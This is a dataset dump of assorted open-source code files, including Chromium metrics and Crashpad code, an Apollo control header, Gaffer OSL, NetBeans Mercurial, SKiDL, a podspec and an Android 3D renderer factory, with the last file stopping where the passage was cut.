max_stars_count
int64 301
224k
| text
stringlengths 6
1.05M
| token_count
int64 3
727k
|
---|---|---|
335 | <reponame>Safal08/Hacktoberfest-1
{
"word": "Both",
"definitions": [
"Used before the first of two alternatives to emphasize that the statement being made applies to each (the other alternative being introduced by \u2018and\u2019)"
],
"parts-of-speech": "Adverb"
} | 100 |
561 | ##########################################################################
#
# Copyright (c) 2018, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of <NAME> nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import Gaffer
import GafferOSL
class __DummyShaderPlug( object ):
def __init__( self, node ):
self.__node = node
def setInput( self, plug ):
if isinstance( self.__node, GafferOSL.OSLImage ):
parentPlug = self.__node["channels"]
else:
parentPlug = self.__node["primitiveVariables"]
if not "legacyClosure" in parentPlug:
parentPlug.addChild(
Gaffer.NameValuePlug( "", GafferOSL.ClosurePlug( "closure", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ), True, "legacyClosure" )
)
parentPlug["legacyClosure"]["value"].setInput( plug )
# Provides backwards compatibility by allowing access to closure plug
# using its old name of "shader".
def __oslReplaceShaderGetItem( originalGetItem ) :
def getItem( self, key ) :
if key == "shader":
return __DummyShaderPlug( self )
else:
return originalGetItem( self, key )
return getItem
GafferOSL.OSLObject.__getitem__ = __oslReplaceShaderGetItem( GafferOSL.OSLObject.__getitem__ )
GafferOSL.OSLImage.__getitem__ = __oslReplaceShaderGetItem( GafferOSL.OSLImage.__getitem__ )
def __oslShaderGetItem( originalGetItem ) :
def getItem( self, key ) :
if key != "out":
return originalGetItem( self, key )
if originalGetItem( self, "name" ).getValue() not in [ "ObjectProcessing/OutObject", "ImageProcessing/OutImage" ]:
return originalGetItem( self, key )
scriptNode = self.ancestor( Gaffer.ScriptNode )
if not scriptNode or not scriptNode.isExecuting():
return originalGetItem( self, key )
parentNode = self.ancestor( Gaffer.Node )
gafferVersion = None
while parentNode :
gafferVersion = (
Gaffer.Metadata.value( parentNode, "serialiser:milestoneVersion" ),
Gaffer.Metadata.value( parentNode, "serialiser:majorVersion" ),
Gaffer.Metadata.value( parentNode, "serialiser:minorVersion" ),
Gaffer.Metadata.value( parentNode, "serialiser:patchVersion" )
)
# only use the information if we have valid information from the node
if not filter( lambda x : x is None, gafferVersion ) :
break
gafferVersion = None
parentNode = parentNode.ancestor( Gaffer.Node )
if gafferVersion is not None and gafferVersion < ( 0, 54, 0, 0 ) :
return originalGetItem( self, "out" )["out"]
return originalGetItem( self, "out" )
return getItem
GafferOSL.OSLShader.__getitem__ = __oslShaderGetItem( GafferOSL.OSLShader.__getitem__ )
| 1,382 |
14,668 | // Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef BASE_METRICS_HISTOGRAM_FUNCTIONS_H_
#define BASE_METRICS_HISTOGRAM_FUNCTIONS_H_
#include <string>
#include <type_traits>
#include "base/metrics/histogram.h"
#include "base/metrics/histogram_base.h"
#include "base/time/time.h"
// TODO(crbug/1265443): Update this file's function comments to provide more
// detail, like histogram_macros.h.
//
// Functions for recording metrics.
//
// For best practices on deciding when to emit to a histogram and what form
// the histogram should take, see
// https://chromium.googlesource.com/chromium/src.git/+/HEAD/tools/metrics/histograms/README.md
//
// For deciding whether to use the function or macro APIs, see
// https://chromium.googlesource.com/chromium/src/+/HEAD/tools/metrics/histograms/README.md#coding-emitting-to-histograms"
//
// Every function is duplicated to take both std::string and char* for the name.
// This avoids ctor/dtor instantiation for constant strings to std::string,
// which makes the call be larger than caching macros (which do accept char*)
// in those cases.
namespace base {
// For numeric measurements where you want exact integer values up to
// |exclusive_max|. |exclusive_max| itself is included in the overflow bucket.
// Therefore, if you want an accurate measure up to kMax, then |exclusive_max|
// should be set to kMax + 1.
//
// |exclusive_max| should be 101 or less. If you need to capture a larger range,
// we recommend the use of the COUNT histograms below.
//
// Sample usage:
// base::UmaHistogramExactLinear("Histogram.Linear", sample, kMax + 1);
// In this case, buckets are 1, 2, .., kMax, kMax+1, where the kMax+1 bucket
// captures everything kMax+1 and above.
BASE_EXPORT void UmaHistogramExactLinear(const std::string& name,
int sample,
int exclusive_max);
BASE_EXPORT void UmaHistogramExactLinear(const char* name,
int sample,
int exclusive_max);
// For adding a sample to an enumerated histogram.
// Sample usage:
// // These values are persisted to logs. Entries should not be renumbered and
// // numeric values should never be reused.
// enum class NewTabPageAction {
// kUseOmnibox = 0,
// kClickTitle = 1,
// // kUseSearchbox = 2, // no longer used, combined into omnibox
// kOpenBookmark = 3,
// kMaxValue = kOpenBookmark,
// };
// base::UmaHistogramEnumeration("My.Enumeration",
// NewTabPageAction::kUseSearchbox);
template <typename T>
void UmaHistogramEnumeration(const std::string& name, T sample) {
static_assert(std::is_enum<T>::value, "T is not an enum.");
// This also ensures that an enumeration that doesn't define kMaxValue fails
// with a semi-useful error ("no member named 'kMaxValue' in ...").
static_assert(static_cast<uintmax_t>(T::kMaxValue) <=
static_cast<uintmax_t>(INT_MAX) - 1,
"Enumeration's kMaxValue is out of range of INT_MAX!");
DCHECK_LE(static_cast<uintmax_t>(sample),
static_cast<uintmax_t>(T::kMaxValue));
return UmaHistogramExactLinear(name, static_cast<int>(sample),
static_cast<int>(T::kMaxValue) + 1);
}
template <typename T>
void UmaHistogramEnumeration(const char* name, T sample) {
static_assert(std::is_enum<T>::value, "T is not an enum.");
// This also ensures that an enumeration that doesn't define kMaxValue fails
// with a semi-useful error ("no member named 'kMaxValue' in ...").
static_assert(static_cast<uintmax_t>(T::kMaxValue) <=
static_cast<uintmax_t>(INT_MAX) - 1,
"Enumeration's kMaxValue is out of range of INT_MAX!");
DCHECK_LE(static_cast<uintmax_t>(sample),
static_cast<uintmax_t>(T::kMaxValue));
return UmaHistogramExactLinear(name, static_cast<int>(sample),
static_cast<int>(T::kMaxValue) + 1);
}
// Some legacy histograms may manually specify the enum size, with a kCount,
// COUNT, kMaxValue, or MAX_VALUE sentinel like so:
// // These values are persisted to logs. Entries should not be renumbered and
// // numeric values should never be reused.
// enum class NewTabPageAction {
// kUseOmnibox = 0,
// kClickTitle = 1,
// // kUseSearchbox = 2, // no longer used, combined into omnibox
// kOpenBookmark = 3,
// kCount,
// };
// base::UmaHistogramEnumeration("My.Enumeration",
// NewTabPageAction::kUseSearchbox,
// kCount);
// Note: The value in |sample| must be strictly less than |enum_size|. This is
// otherwise functionally equivalent to the above.
template <typename T>
void UmaHistogramEnumeration(const std::string& name, T sample, T enum_size) {
static_assert(std::is_enum<T>::value, "T is not an enum.");
DCHECK_LE(static_cast<uintmax_t>(enum_size), static_cast<uintmax_t>(INT_MAX));
DCHECK_LT(static_cast<uintmax_t>(sample), static_cast<uintmax_t>(enum_size));
return UmaHistogramExactLinear(name, static_cast<int>(sample),
static_cast<int>(enum_size));
}
template <typename T>
void UmaHistogramEnumeration(const char* name, T sample, T enum_size) {
static_assert(std::is_enum<T>::value, "T is not an enum.");
DCHECK_LE(static_cast<uintmax_t>(enum_size), static_cast<uintmax_t>(INT_MAX));
DCHECK_LT(static_cast<uintmax_t>(sample), static_cast<uintmax_t>(enum_size));
return UmaHistogramExactLinear(name, static_cast<int>(sample),
static_cast<int>(enum_size));
}
// For adding boolean sample to histogram.
// Sample usage:
// base::UmaHistogramBoolean("My.Boolean", true)
BASE_EXPORT void UmaHistogramBoolean(const std::string& name, bool sample);
BASE_EXPORT void UmaHistogramBoolean(const char* name, bool sample);
// For adding histogram sample denoting a percentage.
// Percents are integers between 1 and 100, inclusively.
// Sample usage:
// base::UmaHistogramPercentage("My.Percent", 69)
BASE_EXPORT void UmaHistogramPercentage(const std::string& name, int percent);
BASE_EXPORT void UmaHistogramPercentage(const char* name, int percent);
// Obsolete. Use |UmaHistogramPercentage| instead. See crbug/1121318.
BASE_EXPORT void UmaHistogramPercentageObsoleteDoNotUse(const std::string& name,
int percent);
BASE_EXPORT void UmaHistogramPercentageObsoleteDoNotUse(const char* name,
int percent);
// For adding counts histogram.
// Sample usage:
// base::UmaHistogramCustomCounts("My.Counts", some_value, 1, 600, 30)
BASE_EXPORT void UmaHistogramCustomCounts(const std::string& name,
int sample,
int min,
int exclusive_max,
int buckets);
BASE_EXPORT void UmaHistogramCustomCounts(const char* name,
int sample,
int min,
int exclusive_max,
int buckets);
// Counts specialization for maximum counts 100, 1000, 10k, 100k, 1M and 10M.
BASE_EXPORT void UmaHistogramCounts100(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramCounts100(const char* name, int sample);
BASE_EXPORT void UmaHistogramCounts1000(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramCounts1000(const char* name, int sample);
BASE_EXPORT void UmaHistogramCounts10000(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramCounts10000(const char* name, int sample);
BASE_EXPORT void UmaHistogramCounts100000(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramCounts100000(const char* name, int sample);
BASE_EXPORT void UmaHistogramCounts1M(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramCounts1M(const char* name, int sample);
BASE_EXPORT void UmaHistogramCounts10M(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramCounts10M(const char* name, int sample);
// For histograms storing times. It uses milliseconds granularity.
BASE_EXPORT void UmaHistogramCustomTimes(const std::string& name,
TimeDelta sample,
TimeDelta min,
TimeDelta max,
int buckets);
BASE_EXPORT void UmaHistogramCustomTimes(const char* name,
TimeDelta sample,
TimeDelta min,
TimeDelta max,
int buckets);
// For short timings from 1 ms up to 10 seconds (50 buckets).
BASE_EXPORT void UmaHistogramTimes(const std::string& name, TimeDelta sample);
BASE_EXPORT void UmaHistogramTimes(const char* name, TimeDelta sample);
// For medium timings up to 3 minutes (50 buckets).
BASE_EXPORT void UmaHistogramMediumTimes(const std::string& name,
TimeDelta sample);
BASE_EXPORT void UmaHistogramMediumTimes(const char* name, TimeDelta sample);
// For time intervals up to 1 hr (50 buckets).
BASE_EXPORT void UmaHistogramLongTimes(const std::string& name,
TimeDelta sample);
BASE_EXPORT void UmaHistogramLongTimes(const char* name, TimeDelta sample);
// For time intervals up to 1 hr (100 buckets).
BASE_EXPORT void UmaHistogramLongTimes100(const std::string& name,
TimeDelta sample);
BASE_EXPORT void UmaHistogramLongTimes100(const char* name, TimeDelta sample);
// For histograms storing times with microseconds granularity.
BASE_EXPORT void UmaHistogramCustomMicrosecondsTimes(const std::string& name,
TimeDelta sample,
TimeDelta min,
TimeDelta max,
int buckets);
BASE_EXPORT void UmaHistogramCustomMicrosecondsTimes(const char* name,
TimeDelta sample,
TimeDelta min,
TimeDelta max,
int buckets);
// For microseconds timings from 1 microsecond up to 10 seconds (50 buckets).
BASE_EXPORT void UmaHistogramMicrosecondsTimes(const std::string& name,
TimeDelta sample);
BASE_EXPORT void UmaHistogramMicrosecondsTimes(const char* name,
TimeDelta sample);
// For recording memory related histograms.
// Used to measure common KB-granularity memory stats. Range is up to 500M.
BASE_EXPORT void UmaHistogramMemoryKB(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramMemoryKB(const char* name, int sample);
// Used to measure common MB-granularity memory stats. Range is up to ~1G.
BASE_EXPORT void UmaHistogramMemoryMB(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramMemoryMB(const char* name, int sample);
// Used to measure common MB-granularity memory stats. Range is up to ~64G.
BASE_EXPORT void UmaHistogramMemoryLargeMB(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramMemoryLargeMB(const char* name, int sample);
// For recording sparse histograms.
// The |sample| can be a negative or non-negative number.
//
// Sparse histograms are well suited for recording counts of exact sample values
// that are sparsely distributed over a relatively large range, in cases where
// ultra-fast performance is not critical. For instance, Sqlite.Version.* are
// sparse because for any given database, there's going to be exactly one
// version logged.
//
// Performance:
// ------------
// Sparse histograms are typically more memory-efficient but less time-efficient
// than other histograms. Essentially, they sparse histograms use a map rather
// than a vector for their backing storage; they also require lock acquisition
// to increment a sample, whereas other histogram do not. Hence, each increment
// operation is a bit slower than for other histograms. But, if the data is
// sparse, then they use less memory client-side, because they allocate buckets
// on demand rather than preallocating.
//
// Data size:
// ----------
// Note that server-side, we still need to load all buckets, across all users,
// at once. Thus, please avoid exploding such histograms, i.e. uploading many
// many distinct values to the server (across all users). Concretely, keep the
// number of distinct values <= 100 ideally, definitely <= 1000. If you have no
// guarantees on the range of your data, use clamping, e.g.:
// UmaHistogramSparse("My.Histogram", base::clamp(value, 0, 200));
BASE_EXPORT void UmaHistogramSparse(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramSparse(const char* name, int sample);
} // namespace base
#endif // BASE_METRICS_HISTOGRAM_FUNCTIONS_H_
| 5,520 |
365 | //
// SegmentTabController.h
// YPTabBarController
//
// Created by 喻平 on 16/5/23.
// Copyright © 2016年 YPTabBarController. All rights reserved.
//
#import "YPTabBarController.h"
@interface SegmentTabController : YPTabBarController
@end
| 89 |
22,688 | /******************************************************************************
* Copyright 2017 The Apollo Authors. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*****************************************************************************/
#pragma once
#include <memory>
#include <string>
#include "cyber/class_loader/class_loader.h"
#include "cyber/component/timer_component.h"
#include "cyber/time/time.h"
#include "modules/canbus/proto/chassis.pb.h"
#include "modules/common/monitor_log/monitor_log_buffer.h"
#include "modules/control/proto/control_cmd.pb.h"
#include "modules/control/proto/control_conf.pb.h"
#include "modules/control/proto/pad_msg.pb.h"
#include "modules/localization/proto/localization.pb.h"
#include "modules/planning/proto/planning.pb.h"
#include "modules/common/util/util.h"
#include "modules/control/common/dependency_injector.h"
#include "modules/control/controller/controller_agent.h"
#include "modules/control/proto/preprocessor.pb.h"
#include "modules/control/submodules/preprocessor_submodule.h"
/**
* @namespace apollo::control
* @brief apollo::control
*/
namespace apollo {
namespace control {
/**
* @class Control
*
* @brief control module main class, it processes localization, chassis, and
* pad data to compute throttle, brake and steer values.
*/
class ControlComponent final : public apollo::cyber::TimerComponent {
friend class ControlTestBase;
public:
ControlComponent();
bool Init() override;
bool Proc() override;
private:
// Upon receiving pad message
void OnPad(const std::shared_ptr<PadMessage> &pad);
void OnChassis(const std::shared_ptr<apollo::canbus::Chassis> &chassis);
void OnPlanning(
const std::shared_ptr<apollo::planning::ADCTrajectory> &trajectory);
void OnLocalization(
const std::shared_ptr<apollo::localization::LocalizationEstimate>
&localization);
// Upon receiving monitor message
void OnMonitor(
const apollo::common::monitor::MonitorMessage &monitor_message);
common::Status ProduceControlCommand(ControlCommand *control_command);
common::Status CheckInput(LocalView *local_view);
common::Status CheckTimestamp(const LocalView &local_view);
common::Status CheckPad();
private:
apollo::cyber::Time init_time_;
localization::LocalizationEstimate latest_localization_;
canbus::Chassis latest_chassis_;
planning::ADCTrajectory latest_trajectory_;
PadMessage pad_msg_;
common::Header latest_replan_trajectory_header_;
ControllerAgent controller_agent_;
bool estop_ = false;
std::string estop_reason_;
bool pad_received_ = false;
unsigned int status_lost_ = 0;
unsigned int status_sanity_check_failed_ = 0;
unsigned int total_status_lost_ = 0;
unsigned int total_status_sanity_check_failed_ = 0;
ControlConf control_conf_;
std::mutex mutex_;
std::shared_ptr<cyber::Reader<apollo::canbus::Chassis>> chassis_reader_;
std::shared_ptr<cyber::Reader<PadMessage>> pad_msg_reader_;
std::shared_ptr<cyber::Reader<apollo::localization::LocalizationEstimate>>
localization_reader_;
std::shared_ptr<cyber::Reader<apollo::planning::ADCTrajectory>>
trajectory_reader_;
std::shared_ptr<cyber::Writer<ControlCommand>> control_cmd_writer_;
// when using control submodules
std::shared_ptr<cyber::Writer<LocalView>> local_view_writer_;
common::monitor::MonitorLogBuffer monitor_logger_buffer_;
LocalView local_view_;
std::shared_ptr<DependencyInjector> injector_;
};
CYBER_REGISTER_COMPONENT(ControlComponent)
} // namespace control
} // namespace apollo
| 1,254 |
331 | <filename>packages/api-explorer-style/package.json
{
"name": "@colmena/api-explorer-style",
"version": "0.1.0",
"description": "Colmena style for the Loopback API Explorer",
"publishConfig": {
"access": "public"
},
"license": "MIT",
"author": "<NAME> <<EMAIL>> (https://github.com/beeman) (https://twitter.com/beeman_nl)",
"url": "https://github.com/colmena/colmena"
}
| 149 |
997 | #ifndef CRYPTO_SIGN_H
#define CRYPTO_SIGN_H
#include "api.h"
#endif
| 35 |
14,668 | // Copyright 2020 The Crashpad Authors. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "util/file/output_stream_file_writer.h"
#include "base/logging.h"
#include "base/notreached.h"
#include "util/stream/output_stream_interface.h"
namespace crashpad {
OutputStreamFileWriter::OutputStreamFileWriter(
std::unique_ptr<OutputStreamInterface> output_stream)
: output_stream_(std::move(output_stream)),
flush_needed_(false),
flushed_(false) {}
OutputStreamFileWriter::~OutputStreamFileWriter() {
DCHECK(!flush_needed_);
}
bool OutputStreamFileWriter::Write(const void* data, size_t size) {
DCHECK(!flushed_);
flush_needed_ =
output_stream_->Write(static_cast<const uint8_t*>(data), size);
return flush_needed_;
}
bool OutputStreamFileWriter::WriteIoVec(std::vector<WritableIoVec>* iovecs) {
DCHECK(!flushed_);
flush_needed_ = true;
if (iovecs->empty()) {
LOG(ERROR) << "no iovecs";
flush_needed_ = false;
return false;
}
for (const WritableIoVec& iov : *iovecs) {
if (!output_stream_->Write(static_cast<const uint8_t*>(iov.iov_base),
iov.iov_len)) {
flush_needed_ = false;
return false;
}
}
return true;
}
FileOffset OutputStreamFileWriter::Seek(FileOffset offset, int whence) {
NOTREACHED();
return -1;
}
bool OutputStreamFileWriter::Flush() {
flush_needed_ = false;
flushed_ = true;
return output_stream_->Flush();
}
} // namespace crashpad
| 702 |
14,668 | <gh_stars>1000+
// Copyright (c) 2013 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "scoped_refptr.h"
struct Foo {
int dummy;
};
struct Bar : public Foo {
int another_dummy;
};
void ExpectsRawPtr(Foo* foo) {
Foo* temp = foo;
}
// Ensure that de-referencing scoped_refptr<>'s are properly rewritten as
// ->get() calls, and that the correct conversion is rewritten (eg: not the
// Bar* -> Foo* conversion).
Foo* GetHeapFoo() {
scoped_refptr<Bar>* heap_allocated = new scoped_refptr<Bar>();
*heap_allocated = new Bar;
return heap_allocated->get();
}
| 231 |
1,056 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.netbeans.modules.mercurial.ui.repository;
import org.netbeans.modules.mercurial.config.Scrambler;
import java.net.URISyntaxException;
/**
*
* @author <NAME>
*/
public class RepositoryConnection {
private static final String RC_DELIMITER = "~=~"; // NOI18N
private HgURL url;
private String externalCommand;
private boolean savePassword;
public RepositoryConnection(String url) throws URISyntaxException {
this(new HgURL(url), null, false);
}
public RepositoryConnection(String url,
String username,
String password,
String externalCommand,
boolean savePassword) throws URISyntaxException {
this(new HgURL(url, username, password == null ? null : password.toCharArray()), externalCommand, savePassword);
}
public RepositoryConnection(HgURL url, String externalCommand, boolean savePassword) {
this.url = url;
this.externalCommand = externalCommand;
this.savePassword = savePassword;
}
public HgURL getUrl() {
return url;
}
String getUsername() {
return url.getUsername();
}
char[] getPassword() {
return url.getPassword();
}
public String getExternalCommand() {
return externalCommand;
}
public boolean isSavePassword() {
return savePassword;
}
public boolean equals(Object o) {
if (o == null) {
return false;
}
if (getClass() != o.getClass()) {
return false;
}
final RepositoryConnection test = (RepositoryConnection) o;
if (this.url != test.url && this.url != null && !this.url.equals(test.url)) {
return false;
}
return true;
}
public int hashCode() {
int hash = 3;
hash = 61 * hash + (this.url != null ? this.url.hashCode() : 0);
return hash;
}
@Override
public String toString() {
return url.toString();
}
public static String getString(RepositoryConnection rc) {
String url = rc.url.toUrlStringWithoutUserInfo();
String username = rc.getUsername();
String extCommand = rc.getExternalCommand();
StringBuffer sb = new StringBuffer();
sb.append(url);
sb.append(RC_DELIMITER);
if (username != null) {
sb.append(username);
}
sb.append(RC_DELIMITER);
sb.append(""); //NOI18N
sb.append(RC_DELIMITER);
if (extCommand != null) {
sb.append(extCommand);
}
sb.append(RC_DELIMITER);
sb.append(RC_DELIMITER);
return sb.toString();
}
public static RepositoryConnection parse(String str) throws URISyntaxException {
String[] fields = str.split(RC_DELIMITER);
int l = fields.length;
String url = fields[0];
String username = l > 1 && !fields[1].equals("") ? fields[1] : null; // NOI18N
String password = l > 2 && !fields[2].equals("") ? Scrambler.getInstance().descramble(fields[2]) : null; // NOI18N
String extCmd = l > 3 && !fields[3].equals("") ? fields[3] : null; // NOI18N
boolean save = l > 4 && !fields[4].equals("") ? Boolean.parseBoolean(fields[4]) : true;
return new RepositoryConnection(url,
username,
(username != null) ? password : null,
extCmd,
save);
}
}
| 2,049 |
700 | # -*- coding: utf-8 -*-
# The MIT License (MIT) - Copyright (c) 2016-2021 <NAME>.
"""
Package a subcircuit so it can be used like a Part.
"""
from __future__ import ( # isort:skip
absolute_import,
division,
print_function,
unicode_literals,
)
from builtins import super, zip
from copy import copy
from future import standard_library
from .bus import Bus
from .circuit import subcircuit
from .interface import Interface
from .net import Net
from .part import NETLIST
from .protonet import ProtoNet
standard_library.install_aliases()
class Package(Interface):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self["circuit"] = None
# Don't use update(). It doesn't seem to call __setitem__.
for k, v in list(kwargs.items()):
self[k] = v # Use __setitem__ so both dict item and attribute are created.
def __call__(self, *args, **kwargs):
"""Create a copy of a package."""
# Get circuit that will contain the package subcircuitry.
circuit = kwargs.pop("circuit", default_circuit)
# See if this package should be instantiated into the netlist or used as a template.
dest = kwargs.pop("dest", NETLIST)
pckg = Package(**self.copy()) # Create a shallow copy of the package.
# Set the circuit that the ProtoNets belong to. Also, make copies of any
# implicit buses or nets that were specified as default I/Os in the
# package definition.
for k, v in pckg.items():
if isinstance(v, ProtoNet):
v.circuit = circuit
elif isinstance(v, (Net, Bus)):
if v.is_implicit():
pckg[k] = v.__class__()
# pckg[k] = v.copy()
# Don't use update(). It doesn't seem to call __setitem__.
for k, v in list(kwargs.items()):
pckg[k] = v # Use __setitem__ so both dict item and attribute are created.
pckg.subcircuit = self.subcircuit # Assign subcircuit creation function.
# Remove creation function so it's not passed as a parameter.
del pckg["subcircuit"]
# Add package to circuit only if it's supposed to be instantiated.
if dest == NETLIST:
circuit += pckg
return pckg
def is_movable(self):
return True
for obj in self.values():
try:
if not obj.is_movable():
return False # Interface is not movable if any object in it is not movable.
except AttributeError:
pass # Objects without is_movable() are always movable.
return True # Every object in the Interface that could move was movable.
def package(subcirc_func):
"""Decorator that creates a package for a subcircuit routine."""
pckg = Package() # Create the package.
# Store the parameter names passed to the subcircuit.
code = subcirc_func.__code__
num_args = code.co_argcount
arg_names = code.co_varnames[:num_args]
# By default, set parameters to a package to be ProtoNets.
for arg_name in arg_names:
pn = ProtoNet(arg_name, circuit=None)
pn.intfc = pckg
pn.intfc_key = arg_name
pckg[arg_name] = pn
# Set any default values for the parameters.
if getattr(subcirc_func, "__defaults__", None):
for arg_name, dflt_value in zip(
reversed(arg_names), reversed(subcirc_func.__defaults__)
):
pckg[arg_name] = dflt_value
if getattr(subcirc_func, "__kwdefaults__", None):
for arg_name, dflt_value in subcirc_func.__kwdefaults__.items():
pckg[arg_name] = dflt_value
# Create the subcircuit function that will be called to insantiate this package.
pckg.subcircuit = subcircuit(subcirc_func)
# Remove the subcircuit key from the dict so it won't be passed to subcirc_func().
del pckg["subcircuit"]
return pckg
| 1,619 |
5,169 | <reponame>Gantios/Specs
{
"name": "ContainerManager",
"version": "2.0.0",
"summary": "Helper classes to ContainerView usage with IE in Swift.",
"description": "ContainerManager helps you with linking more than one ViewController to the same ContainerView with segues in the Interface Builder in Swift.",
"homepage": "https://github.com/brurend/ContainerManager",
"license": "MIT",
"authors": {
"brurend": "<EMAIL>"
},
"source": {
"git": "https://github.com/brurend/ContainerManager.git",
"tag": "2.0.0"
},
"platforms": {
"ios": "8.3"
},
"requires_arc": true,
"source_files": "ContainerManager/*"
}
| 226 |
726 | package org.andresoviedo.android_3d_model_engine.drawer;
import android.content.Context;
import androidx.annotation.NonNull;
import android.util.Log;
import org.andresoviedo.android_3d_model_engine.R;
import org.andresoviedo.android_3d_model_engine.model.AnimatedModel;
import org.andresoviedo.android_3d_model_engine.model.Object3DData;
import org.andresoviedo.util.io.IOUtils;
import java.io.IOException;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;
/**
* Copyright 2013-2020 <EMAIL>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
* DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
* OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*
*/
public class RendererFactory {
/**
* shader code loaded from raw resources
* resources are cached on activity thread
*/
private Map<String, String> shadersCode = new HashMap<>();
/**
* list of opengl drawers
*/
private Map<Shader, GLES20Renderer> drawers = new HashMap<>();
public RendererFactory(Context context) throws IllegalAccessException, IOException {
Log.i("RendererFactory", "Discovering shaders...");
Field[] fields = R.raw.class.getFields();
for (int count = 0; count < fields.length; count++) {
String shaderId = fields[count].getName();
Log.v("RendererFactory", "Loading shader... " + shaderId);
int shaderResId = fields[count].getInt(fields[count]);
byte[] shaderBytes = IOUtils.read(context.getResources().openRawResource(shaderResId));
String shaderCode = new String(shaderBytes);
shadersCode.put(shaderId, shaderCode);
}
Log.i("RendererFactory", "Shaders loaded: " + shadersCode.size());
}
public Renderer getDrawer(Object3DData obj, boolean usingSkyBox, boolean usingTextures, boolean usingLights, boolean usingAnimation, boolean drawColors) {
// double check features
boolean isAnimated = usingAnimation && obj instanceof AnimatedModel
&& ((AnimatedModel) obj).getAnimation() != null && (((AnimatedModel) obj).getAnimation()).isInitialized();
boolean isUsingLights = usingLights && (obj.getNormalsBuffer() != null || obj.getNormalsBuffer() != null);
boolean isTextured = usingTextures && obj.getTextureData() != null && obj.getTextureBuffer() != null;
boolean isColoured = drawColors && obj != null && (obj.getColorsBuffer() != null || obj
.getColorsBuffer() != null);
final Shader shader = getShader(usingSkyBox, isAnimated, isUsingLights, isTextured, isColoured);
// get cached drawer
GLES20Renderer drawer = drawers.get(shader);
if (drawer != null) return drawer;
// build drawer
String vertexShaderCode = shadersCode.get(shader.vertexShaderCode);
String fragmentShaderCode = shadersCode.get(shader.fragmentShaderCode);
if (vertexShaderCode == null || fragmentShaderCode == null) {
